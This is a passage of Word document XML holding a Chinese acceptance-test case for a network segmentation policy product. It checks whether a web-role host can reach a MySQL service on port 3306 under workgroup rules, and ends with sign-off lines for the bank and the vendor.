                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01加入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02加入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01角色为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02角色为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>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lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minor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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1. 新建策略集</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>test；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2. 点击策略集详情，将工作组group1、group2添加至策略集</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>test的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">覆盖范围 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3. 将group1和group2开启防护模式</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4. 点击添加工作组内规则，允许角色web访问角色mysql的3306端口的mysql服务，并下发规则</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5. 在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>执行：mysql  -u root -p -h （</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP）,输入正确密码登录</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>6. 将</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改至group1中</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7. 在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>执行：mysql  -u root -p -h （</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP）,输入正确密码登录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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果1（步骤5）：使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>访问Oracle-76-02的3306端口的mysql服务失败</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果2（步骤7）：使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>访问Oracle-76-02的3306端口的mysql服务成功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lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801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_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc454300391"/>
      <w:bookmarkStart w:id="125" w:name="_Toc23262"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则库</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动</w:t>
      </w:r>
      <w:r>
        <w:t>更新</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
